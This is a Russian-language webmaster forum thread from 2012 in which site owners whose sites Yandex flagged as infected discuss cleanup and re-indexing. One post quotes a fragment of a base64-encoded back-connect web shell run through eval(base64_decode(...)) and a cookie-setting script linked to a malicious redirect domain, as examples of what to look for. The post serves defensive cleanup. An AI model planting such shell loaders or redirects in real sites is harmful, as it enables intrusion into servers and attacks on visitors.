Проверьте код, который залили на инфицированный ресурс jndtesn. Com - Яндекс

VectorD · 2012-04-24T20:18:13.0000000Z

Яндекс утверждает, что на страницах сайта обнаружен вредоносный код. Посмотрев шаблоны - нашел какую-то фигню, но не уверен, что это был именно он. Отправил на проверку яндексу. Есть тут специалисты по безопасности, кто поможет найти код?

D

22

dogmatek

25 апреля 2012, 18:56

#11

Такая же ситуация и у меня прозошла в Пасхальные дни. только через 3 дня смог перезалить данные на сервер. яндекс обнулил показатели сайта через 5 дней и досих пор не вернул.

147

fillonon

25 апреля 2012, 21:18

#12

может есть какие то ссылки на иконки с другого сайта, который яндексом помечен как вредоносный, в общем гадать можно сколько угодно...

Если нужно SEO продвижение ( https://seouspeh.ru/ ) - конкурировал с миллиардерами в поиске

DH

113

DpoHro

26 апреля 2012, 04:29

#13

dogmatek:
Такая же ситуация и у меня прозошла в Пасхальные дни. только через 3 дня смог перезалить данные на сервер. яндекс обнулил показатели сайта через 5 дней и досих пор не вернул.

Что значит обнулил у меня тиц на месте в выдаче вот сегодня ночью 10 страниц появилось, к утру исчезли уже.

Ты писал платонам? ответили нет?

+1

D

22

dogmatek

26 апреля 2012, 05:38

#14

DpoHro:
Что значит обнулил у меня тиц на месте в выдаче вот сегодня ночью 10 страниц появилось, к утру исчезли уже.
Ты писал платонам? ответили нет?

В индексе 0 страниц, сайт в поиске не высвечивается. В техслужбу в пошлую пятницу писал, молчат пока.

R

180

Алексей

27 апреля 2012, 07:43

#15

VectorD:
Cайт был перепроверен 25 Апреля 2012. К сожалению, на сайте остались страницы, содержащие вредоносный код.
Не понимаю, как от него избавиться, скорее всего он считает нечто невредоносное вредосным.
Причем в вебмастере только главная страница показана как вредоносная. Но через поиск весь сайт показан вредоносным

Как и говорил ранее, если яндекс пишет, что сайт заражен так оно и есть, очень редко когда яндекс ошибается. Вирус может появляться раз в сутки, поэтому яндекс может, то показывать, что сайт заражен, то нет.

Удаление вирусов с сайта, защита сайта, Гарантия! ( /ru/forum/999073 ) -> топик на маулталк ( http://www.maultalk.com/topic113834s0.html ) -> Топик в сапе ( http://forum.sape.ru/showthread.php?t=79363 ). TELEGRAM - https://t.me/Doktorsaitov

116

shedemon

28 апреля 2012, 18:30

#16

Подскажите так как вылечить сайт от кода, таже проблема, быкапа без вируса не осталось =(..

Перезалил полностью новый WP движек новые плагины и новый шаблон подключил только базу.. Редирект пропал но но всеравно есть 10-40 переходов в сутки а было 1500, глюк счетчика или же сидит он гдето в базе ?

Вирус на WP. Нужна Глюки Я? Joomla Вирус

503

exarh

29 апреля 2012, 15:56

#17

shedemon:
Подскажите так как вылечить сайт от кода, таже проблема, быкапа без вируса не осталось =(..
Перезалил полностью новый WP движек новые плагины и новый шаблон подключил только базу.. Редирект пропал но но всеравно есть 10-40 переходов в сутки а было 1500, глюк счетчика или же сидит он гдето в базе ?

Может опять перезаписался автоматом, проверьте.

Могли бы и код вируса привести тут.

Монетизируй (https://publishers.propellerads.com/#/pub/auth/signUp?ref_id=tnE) свой сайт с выгодой

15

sigor

29 апреля 2012, 16:38

#18

Так нужно смотреть какой код залили, если просто вписали iframe на инфицированный ресурс илм eploit на js это одно... если шел залили это совсем другое (удалять модифицированный код без толку - опять зайдут через шелл и все переиначат, логи сервера тоже можна потереть так что не увидите, кто ходил).

К лечению нужно подойти комплексно - менять пароли к ftp админке и т.д., убивать сомнительных ( а лучше всех админов сайта)...

Искать код, как правило, он шифрованный (если это веб-щелл),

где то так (но не всегла):

.......

$back_connect_c="I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3lzL3NvY2tldC5oPg0

KI2luY2x1ZGUgPG5ldGluZXQvaW4uaD4NCmludCBtYWluKGludCBhDQp7DQogaW50IGZkOw0KIHN0cnVjdCBzb2N

........

вызвается где то так:

eval(base64_decode($back_connect_c);

После того как, вредоносный код убрали, стоит искать дыры, откуда код залили, делать апгрейд системы и т. д..

---------- Добавлено 29.04.2012 в 20:26 ----------

DpoHro

У Вас помоему js-редирект на инфицированный ресурс jindtesn.com

+ подмена кукисов и т. д.:

function setCookie(name,value,time){var today=new Date();var expire=new Date();if(props==null||props==0) props=10;expire.setTime(today.getTime()+time);value=encodeURIComponent(value);var updatedCookie=name+"="+value+";expires="+expire.toGMTString();document.cookie=updatedCookie;}

...

Dr Web:

URL заблокирован SpIDer Gate
jindtesn.com/Причина: Источник распространения вирусов
Дата: ‎29.‎04.‎2012 ‏‎20:23

Распространённые ошибки веб-мастеров при Все, что вам нужно Manul антивирус Яндекса для

15

sigor

1 мая 2012, 10:39

#19

Посмотрите сюда есть скрипт для отлова бацылы

D

22

dogmatek

2 мая 2012, 06:37

#20

DpoHro, Хотел бы поинтересоваться по вопросу возврата страниц в индекс после взлома сайта. Насколько быстро проходит процесс по возврату страниц в индекс Яндекса вашего сайта и если писали в тех поддержку, то что ответили?

У меня вернулось на данный момент 10 страниц, и то это страницы с новыми материалами, которые добавляются в яндекс.новости. В техподдержке ответили через неделю, что позже сообщат причину обнуления показателей:

...Мы постараемся в скором времени определить, по какой причине он отсутствует в поиске, и свяжемся с Вами

Вообщем ничего определенного.

Магазины на Яндекс.Маркете смогут Возвраты не будут влиять Яндекс.Маркет реализовал работу с

Как снизить ДРР до 4,38% и повысить продажи с помощью VK Рекламы

Open AI тестирует память для ChatGPT

Вредоносный код